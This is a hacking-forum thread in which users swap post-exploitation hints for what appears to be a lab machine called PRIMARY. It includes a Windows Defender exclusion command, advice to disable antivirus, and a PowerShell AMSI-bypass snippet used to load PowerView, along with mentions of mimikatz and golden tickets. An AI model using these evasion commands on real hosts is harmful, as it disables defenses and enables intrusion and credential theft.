Posts: 8
Threads: 0
Joined: Jun 2024
Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?
Posts: 28
Threads: 1
Joined: Dec 2023
(Jul 15, 2024, 12:31 AM)david30 Wrote: Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?
abuse AD trusts and get a golden ticket
https://mvc1009.github.io/hackingnotes/a...t-attacks/
Posts: 219
Threads: 14
Joined: Apr 2024
(Jul 15, 2024, 12:33 AM)iiNovaCore Wrote: (Jul 15, 2024, 12:31 AM)david30 Wrote: Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?
abuse AD trusts and get a golden ticket
https://mvc1009.github.io/hackingnotes/a...t-attacks/
what after get system in proxychains4 -u administrator -i 10.0.0.10 - H '' ........... " This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 26
Threads: 8
Joined: Feb 2024
(Jul 15, 2024, 12:43 AM)jimmyshoemacher Wrote: im stuck on ntauthority in PRIMARY
does anyone know where to go from here?
i can't run mimikatz, tried to obfuscate it doesn't work
I have tried many meterpreter shells those all get blocked.
i have a shell as ntauthority but no clue what to do at this point.
disable AV and go from there
Posts: 219
Threads: 14
Joined: Apr 2024
guys any hint after nauthority with evil-winrm This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 196
Threads: 31
Joined: Apr 2024
Jul 15, 2024, 12:59 AM
(This post was last modified: Jul 15, 2024, 12:59 AM by maggi.)
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
Posts: 219
Threads: 14
Joined: Apr 2024
Jul 15, 2024, 01:16 AM
(This post was last modified: Jul 15, 2024, 01:18 AM by osamy7593.)
(Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1" This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 196
Threads: 31
Joined: Apr 2024
Jul 15, 2024, 01:35 AM
(This post was last modified: Jul 15, 2024, 01:35 AM by maggi.)
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"
i was using this to load powerview
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
That exclusion almost got mimikatz working tho...so more potent, I like
Posts: 219
Threads: 14
Joined: Apr 2024
(Jul 15, 2024, 01:35 AM)maggi Wrote: (Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"
i was using this to load powerview
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
That exclusion almost got mimikatz working tho...so more potent, I like
Yes this works too bypassing amsi .. Ok what u got This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason:
Asking for rep is not allowed
Posts: 196
Threads: 31
Joined: Apr 2024
Jul 15, 2024, 01:56 AM
(This post was last modified: Jul 15, 2024, 01:58 AM by maggi.)
(Jul 15, 2024, 01:42 AM)osamy7593 Wrote: (Jul 15, 2024, 01:35 AM)maggi Wrote: (Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: (Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm
I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: (Jul 15, 2024, 12:59 AM)maggi Wrote: I started running powerview but the av is whinging about everything else
bro add exclusion path
powershell Set-MpPreference -ExclusionPath ../.../../../powerview
after that run it .. tell me what u get powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"
i was using this to load powerview
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
That exclusion almost got mimikatz working tho...so more potent, I like
Yes this works too bypassing amsi .. Ok what u got
I have been readin the stuff on cross forest attacks....it is not quite clicking yet; well I don'tknow if I am messing up bloodhound anal-sis or I am plain illiterate glosing over soemthing in the readings
Direction : BiDirectional
|